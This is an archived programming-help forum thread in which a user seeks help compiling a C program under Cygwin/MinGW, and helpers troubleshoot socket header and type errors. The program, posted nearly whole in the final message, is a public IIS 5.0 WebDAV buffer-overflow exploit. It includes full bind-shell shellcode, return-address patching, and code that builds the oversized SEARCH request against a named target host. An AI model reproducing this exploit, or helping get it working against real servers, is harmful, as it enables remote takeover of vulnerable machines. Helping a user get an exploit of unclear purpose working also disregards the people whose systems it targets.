Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1727
  • Last Modified:

"storage size of 'dst' isn't known" ??? any ideas?

I am trying to compile this program, and I keep getting this error:

$ gcc test.c
test.c:128:3: warning: multi-line string literals are deprecated
test.c: In function `main':
test.c:140: storage size of `dst' isn't known
test.c:145:18: warning: multi-line string literals are deprecated
test.c:172:27: warning: multi-line string literals are deprecated
test.c:183:27: warning: multi-line string literals are deprecated
test.c:244:34: warning: multi-line string literals are deprecated
test.c:262:10: warning: multi-line string literals are deprecated
test.c:275:16: warning: multi-line string literals are deprecated
test.c:278:12: warning: multi-line string literals are deprecated

Same if i use 'gcc test.c -o test.exe'

Any ideas?
0
MtM
Asked:
MtM
  • 16
  • 4
  • 4
  • +2
1 Solution
 
grg99Commented:
Well, you seem to have something named "dst" that isnt declared before line 140.  

You also have some multi-line literals, which often is a sign of some end-of-line problems.   Did you FTP this file from a DOS system or somesuch?


How about posting your code so we can see what's up?


0
 
MtMAuthor Commented:
Whats your e-mail?  I can forward it to you.
0
 
MtMAuthor Commented:
Whats your e-mail?  I can forward it to you.
0
Transaction-level recovery for Oracle database

Veeam Explore for Oracle delivers low RTOs and RPOs with agentless transaction log backup and transaction-level recovery of Oracle databases. You can restore the database to a precise point in time, even to a specific transaction.

 
MtMAuthor Commented:
I think the problem starts here:

int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

......
0
 
MtMAuthor Commented:
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

...... Skip down a little bit....

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\
n" \
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:search
request>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

I got it off the web
0
 
MtMAuthor Commented:
*Note, thats not all of it... but i was hoping the problem is in there....
0
 
GaryFxCommented:
Do you have any relevant include lines?  On my system you need to #include <netinet/in.h> in order to get the definition of struct sockaddr_in.

Gary
0
 
MtMAuthor Commented:
What do you mean?  I did include netinet/in.h. That is not the whole program there.. and i cut soem stuff out to save space... did i not declare dst right somewhere?
0
 
GaryFxCommented:
I posted my previous note before seeing your more extended posting.

Try getting rid of the backslash at the end of the first line of the definition of body (outside the double quote).

Gary
0
 
MtMAuthor Commented:
I get the same thing... :-/
0
 
MtMAuthor Commented:
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)

That is at the very bottom... and the only other part of the code that has 'dst' in it
0
 
honey_hamsterCommented:
For the 'depricated' error, try making body[] into a single string, instead of 2 strings separated by the backslash, i.e. remove the " before the \, and remove the \, and remove the " that used to be right after the \.

And for dst, you might want to look at netinet\in.h and see the definition of struct sockaddr_in - maybe you need to set something up in order for the size of one of its fields to be known.  Feel free to post your compiler's definition of struct sockaddr_in - maybe somebody here can spot the problem.
0
 
GaryFxCommented:
What version of gcc are you using?  

Gary
0
 
sarda_rameshCommented:
hi there,

it seems that this is not a very big problem. u r expanding strings over two lines , dont do that, put it on a single line. e.g if the string constant is like

"hello \
 world"

write it as "hello world"

in vi editor if the string is longer than the horizonat number of characters it will continue on the next line but if u see the line number (use :set nu) u will see that the two lines are actually one. try using this.

regards
ramesh

0
 
MtMAuthor Commented:
I am using cygwin to emulate unix, and then moved over
minGW for gcc... (DOWNLOADED it yesterday, so newset i guess) and I'm actually not sure of the version.  I have two if.h's, the first includes the other... Here are both of them:


/* netinet/in.h

   Copyright 1998, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _NETINET_IN_H
#define _NETINET_IN_H

#include <cygwin/in.h>

#endif /* _NETINET_IN_H */


THERES THE NEXT ONE:


/* cygwin/if.h

   Copyright 1996, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _CYGWIN_IF_H_
#define _CYGWIN_IF_H_

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */

#include <sys/types.h>
#include <sys/socket.h>

/* Standard interface flags. */
#define IFF_UP          0x1             /* interface is up              */
#define IFF_BROADCAST   0x2             /* broadcast address valid      */
#define IFF_LOOPBACK    0x8             /* is a loopback net            */
#define IFF_NOTRAILERS  0x20            /* avoid use of trailers        */
#define IFF_RUNNING     0x40            /* resources allocated          */
#define IFF_PROMISC     0x100           /* receive all packets          */
#define IFF_MULTICAST   0x1000          /* Supports multicast           */

/*
 * Interface request structure used for socket
 * ioctl's.  All interface ioctl's must have parameter
 * definitions which begin with ifr_name.  The
 * remainder may be interface specific.
 */

struct ifreq
{
#define IFNAMSIZ        16
#define IFHWADDRLEN     6
     union
     {
          char    ifrn_name[IFNAMSIZ];            /* if name, e.g. "en0" */
     } ifr_ifrn;

     union {
          struct  sockaddr ifru_addr;
          struct  sockaddr ifru_broadaddr;
          struct  sockaddr ifru_netmask;
          struct  sockaddr ifru_hwaddr;
          short   ifru_flags;
          int     ifru_metric;
          int     ifru_mtu;
     } ifr_ifru;
};

#define ifr_name        ifr_ifrn.ifrn_name      /* interface name       */
#define ifr_addr        ifr_ifru.ifru_addr      /* address              */
#define ifr_broadaddr   ifr_ifru.ifru_broadaddr /* broadcast address    */
#define ifr_netmask     ifr_ifru.ifru_netmask   /* interface net mask   */
#define ifr_flags       ifr_ifru.ifru_flags     /* flags                */
#define ifr_hwaddr      ifr_ifru.ifru_hwaddr    /* MAC address          */
#define ifr_metric      ifr_ifru.ifru_metric    /* metric               */
#define ifr_mtu         ifr_ifru.ifru_mtu       /* mtu                  */


/*
 * Structure used in SIOCGIFCONF request.
 * Used to retrieve interface configuration
 * for machine (useful for programs which
 * must know all networks accessible).
 */

struct ifconf
{
     int     ifc_len;                        /* size of buffer       */
     union
     {
          caddr_t ifcu_buf;
          struct  ifreq *ifcu_req;
     } ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf               /* buffer address       */
#define ifc_req ifc_ifcu.ifcu_req               /* array of structures  */

#ifdef __cplusplus
};
#endif /* __cplusplus */

#endif /* _CYGWIN_IF_H_ */
0
 
MtMAuthor Commented:
test1.c: In function `main':
test1.c:138: storage size of `dst' isn't known

That is the only error I'm getting now... took care of all those warnings.  I'm so close :-/
0
 
honey_hamsterCommented:
You posted cygwin/if.h, not cygwin/in.h - can you post your in.h?
0
 
MtMAuthor Commented:
My problem before was that I had to of the same in.h in both those folders... So one of them was just includeding the same file again.  Now that I have it including the right in.h with the actual information about all the tcpip stuff it needs... i get this error:

In File included from c:/cygwin/lib/gcc-lib/mingw32/3.2/include/netinet/in.h:14,from test1.c:8:

c:/cygwin/lib/gcc-lib/mingw32/3.2/include/cygwin/in.h:40: parse error before "in_port_t:

c:/cygwin.lib/gcc-lib/wingw32/include/cygwin/in.h:81: parse error before :in_addr_t:

Thanks for your help again
0
 
MtMAuthor Commented:

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{


Looks like thats the line its having problems with
0
 
MtMAuthor Commented:
Opps.. sorry, heres the in.h

/*
 * INET            An implementation of the TCP/IP protocol suite for the LINUX
 *            operating system.  INET is implemented using the  BSD Socket
 *            interface as the means of communication with the user level.
 *
 *            Definitions of the Internet Protocol.
 *
 * Version:      @(#)in.h      1.0.1      04/21/93
 *
 * Authors:      Original taken from the GNU Project <netinet/in.h> file.
 *            Fred N. van Kempen, <waltje@uWalt.NL.Mugnet.ORG>
 *
 *            This program is free software; you can redistribute it and/or
 *            modify it under the terms of the GNU General Public License
 *            as published by the Free Software Foundation; either version
 *            2 of the License, or (at your option) any later version.
 */
#ifndef _CYGWIN_IN_H
#define _CYGWIN_IN_H

#include <cygwin/types.h>

/* Standard well-defined IP protocols.  */
enum
{
  IPPROTO_IP = 0,            /* Dummy protocol for TCP            */
  IPPROTO_ICMP = 1,            /* Internet Control Message Protocol      */
  IPPROTO_IGMP = 2,            /* Internet Gateway Management Protocol */
  IPPROTO_IPIP = 4,            /* IPIP tunnels (older KA9Q tunnels use 94) */
  IPPROTO_TCP = 6,            /* Transmission Control Protocol      */
  IPPROTO_EGP = 8,            /* Exterior Gateway Protocol            */
  IPPROTO_PUP = 12,            /* PUP protocol                        */
  IPPROTO_UDP = 17,            /* User Datagram Protocol            */
  IPPROTO_IDP = 22,            /* XNS IDP protocol                  */

  IPPROTO_RAW = 255,            /* Raw IP packets                  */
  IPPROTO_MAX
};

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{
  IPPORT_ECHO = 7,            /* Echo service.  */
  IPPORT_DISCARD = 9,            /* Discard transmissions service.  */
  IPPORT_SYSTAT = 11,            /* System status service.  */
  IPPORT_DAYTIME = 13,      /* Time of day service.  */
  IPPORT_NETSTAT = 15,      /* Network status service.  */
  IPPORT_FTP = 21,            /* File Transfer Protocol.  */
  IPPORT_TELNET = 23,            /* Telnet protocol.  */
  IPPORT_SMTP = 25,            /* Simple Mail Transfer Protocol.  */
  IPPORT_TIMESERVER = 37,      /* Timeserver service.  */
  IPPORT_NAMESERVER = 42,      /* Domain Name Service.  */
  IPPORT_WHOIS = 43,            /* Internet Whois service.  */
  IPPORT_MTP = 57,

  IPPORT_TFTP = 69,            /* Trivial File Transfer Protocol.  */
  IPPORT_RJE = 77,
  IPPORT_FINGER = 79,            /* Finger service.  */
  IPPORT_TTYLINK = 87,
  IPPORT_SUPDUP = 95,            /* SUPDUP protocol.  */


  IPPORT_EXECSERVER = 512,      /* execd service.  */
  IPPORT_LOGINSERVER = 513,      /* rlogind service.  */
  IPPORT_CMDSERVER = 514,
  IPPORT_EFSSERVER = 520,

  /* UDP ports.  */
  IPPORT_BIFFUDP = 512,
  IPPORT_WHOSERVER = 513,
  IPPORT_ROUTESERVER = 520,

  /* Ports less than this value are reserved for privileged processes.  */
  IPPORT_RESERVED = 1024,

  /* Ports greater this value are reserved for (non-privileged) servers.  */
  IPPORT_USERRESERVED = 5000
};

typedef uint32_t in_addr_t;
/* Internet address. */
struct in_addr
{
  unsigned int s_addr;
};

/* Request struct for multicast socket ops */

struct ip_mreq
{
  struct in_addr imr_multiaddr;      /* IP multicast address of group */
  struct in_addr imr_interface;      /* local IP address of interface */
};


/* Structure describing an Internet (IP) socket address. */
#define __SOCK_SIZE__      16            /* sizeof(struct sockaddr)      */
struct sockaddr_in
{
  short int sin_family;      /* Address family            */
  unsigned short int sin_port;      /* Port number                  */
  struct in_addr sin_addr;      /* Internet address            */

  /* Pad to size of `struct sockaddr'. */
  unsigned char  __pad[__SOCK_SIZE__ - sizeof(short int)
                  - sizeof(unsigned short int) - sizeof(struct in_addr)];
};
#define sin_zero      __pad            /* for BSD UNIX comp. -FvK      */

/*
 * Definitions of the bits in an Internet address integer.
 * On subnets, host and network parts are found according
 * to the subnet mask, not these masks.
 */
#define      IN_CLASSA(a)            ((((long int) (a)) & 0x80000000) == 0)
#define      IN_CLASSA_NET            0xff000000
#define      IN_CLASSA_NSHIFT      24
#define      IN_CLASSA_HOST            (0xffffffff & ~IN_CLASSA_NET)
#define      IN_CLASSA_MAX            128

#define      IN_CLASSB(a)            ((((long int) (a)) & 0xc0000000) == 0x80000000)
#define      IN_CLASSB_NET            0xffff0000
#define      IN_CLASSB_NSHIFT      16
#define      IN_CLASSB_HOST            (0xffffffff & ~IN_CLASSB_NET)
#define      IN_CLASSB_MAX            65536

#define      IN_CLASSC(a)            ((((long int) (a)) & 0xe0000000) == 0xc0000000)
#define      IN_CLASSC_NET            0xffffff00
#define      IN_CLASSC_NSHIFT      8
#define      IN_CLASSC_HOST            (0xffffffff & ~IN_CLASSC_NET)

#define      IN_CLASSD(a)            ((((long int) (a)) & 0xf0000000) == 0xe0000000)
#define      IN_MULTICAST(a)            IN_CLASSD(a)
#define IN_MULTICAST_NET      0xF0000000

#define      IN_EXPERIMENTAL(a)      ((((long int) (a)) & 0xe0000000) == 0xe0000000)
#define      IN_BADCLASS(a)            ((((long int) (a)) & 0xf0000000) == 0xf0000000)

/* Address to accept any incoming messages. */
#define      INADDR_ANY            ((unsigned long int) 0x00000000)

/* Address to send to all hosts. */
#define      INADDR_BROADCAST      ((unsigned long int) 0xffffffff)

/* Address indicating an error return. */
#define      INADDR_NONE            0xffffffff

/* Network number for local host loopback. */
#define      IN_LOOPBACKNET            127

/* Address to loopback in software to local host.  */
#define      INADDR_LOOPBACK            0x7f000001      /* 127.0.0.1   */
#define      IN_LOOPBACK(a)            ((((long int) (a)) & 0xff000000) == 0x7f000000)

/* Defines for Multicast INADDR */
#define INADDR_UNSPEC_GROUP      0xe0000000      /* 224.0.0.0   */
#define INADDR_ALLHOSTS_GROUP      0xe0000001      /* 224.0.0.1   */
#define INADDR_MAX_LOCAL_GROUP  0xe00000ff      /* 224.0.0.255 */

/* <asm/byteorder.h> contains the htonl type stuff.. */

#include <asm/byteorder.h>

/* Some random defines to make it easier in the kernel.. */
#ifdef __KERNEL__

#define LOOPBACK(x)      (((x) & htonl(0xff000000)) == htonl(0x7f000000))
#define MULTICAST(x)      (((x) & htonl(0xf0000000)) == htonl(0xe0000000))

#endif

/* IPv6 definitions as we start to include them. This is just
   a beginning dont get excited 8) */
struct in6_addr
{
  unsigned char s6_addr[16];
};

struct sockaddr_in6
{
  unsigned short sin6_family;
  unsigned short sin6_port;
  unsigned long sin6_flowinfo;
  struct in6_addr sin6_addr;
};
#endif      /* _CYGWIN_IN_H */
0
 
MtMAuthor Commented:
I also just realized that I moved on sys/types.h into both my cygwin dir because i was getting "onclifting types for 'ino_t'  when i put them back to default, with the in.h also at default, the error reads like this:

In file included from c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/in.h:21,
from c:/cygwin/lib/gcc-lb/wingw32/3.2/include/netinet/in.h:14, from test1.c:8:
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/types.h:98: conflicting types for 'ino_t'
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/sys/types.h:121: previous declaration of 'ino_t'
0
 
honey_hamsterCommented:
I think the problem is that the compiler doesn't know what uint32_t and uint16_t are.  At the top of in.h, there is an include of cygwin/types.h.  You might want to check to see whether uintxx_t are typedef'ed in there.  If they are, there might be an #ifndef that's preventing them from being seen by the compiler.  If you can't figure out why uintxx_t aren't being defined, then as an ugly hack, you can add the following 2 lines to your source file before including in.h:
typedef uint32_t unsigned long;
typedef uint16_t unsigned short;
0
 
honey_hamsterCommented:
Sorry, I posted before your final post.  It's not ideal to have 2 different 'types.h' being included by the same .c file.  It's even more dangerous if different .c files include DIFFERENT 'types.h'.  One thing you could try is ensure that the 2 different types.h are identical.  Temporarily rename sys\types.h sys\types.h.old and then copy cygwin\types.h sys\types.h.
0
 
MtMAuthor Commented:
I'm sure its my inexperience, and the fact that I'm using cygwin with minGW, but I can't figure this out.  There is the whole program i'm trying to compile, maybe someone with a real linux/unix compiler can actually compile it.  Then maybe I will know whats up.

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

 
// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

  if (argc < 2 || argc > 5)
        {
          printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
          exit(-1);
        }
 
  // Default target port = 80
  if (argc > 2)
        tport = atoi(argv[2]);
  else
        tport = 80;

  // Default bind port = 31337
  if (argc > 3)
        bport = atoi(argv[3]);
  else
        bport = 31337;

  // Default ret value = RET
  if (argc > 4)
        ret = strtoul(argv[4], NULL, 16);
  else
        ret = RET;

  if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
        {
          fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
          exit(-2);
        }
   
  // Shellcode patching
  port = htons(bport);
  port ^= 0x9999;
 
  if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
        {
          fprintf(stderr, "Binding-port contains null-byte. Use another port.\n Aborted!\n");
          exit(-3);
        }
 
  *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
  *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
  // If the last two items contain any null-bytes, exploit will fail.
  // WARNING: this check is not performed here. Be careful and check it for you

 
  // Resolve hostname
  printf("[*] Resolving hostname ...\n");
  if ((h = gethostbyname(argv[1])) == NULL)
        {
          fprintf(stderr, "%s: unknown hostname\n", argv[1]);
          exit(-4);
        }
 
  bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
        {
          perror("Failed to connect");
          exit(-6);
        }
 
  // Build malicious string...
  printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1],
((ret >> 8) & 0xff), ret & 0xff);

  bzero(buffer, MAXBUF);
  strcpy(buffer, "SEARCH /");
 
  i = strlen(buffer);
  buffer[i] = NOP;         // Align for RET overwrite

  // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill
 
  for (j=i+1; j < i+2150; j+=2)
        *(unsigned short *)&buffer[j] = (unsigned short)ret;

  // The rest is padded with NOP's. RET address should point to this zone!
  for (; j < i+65535-strlen(jumpcode); j++)
        buffer[j] = NOP;

  // Then we skip the body of the HTTP request
  memcpy(&buffer[j], jumpcode, strlen(jumpcode));

  strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
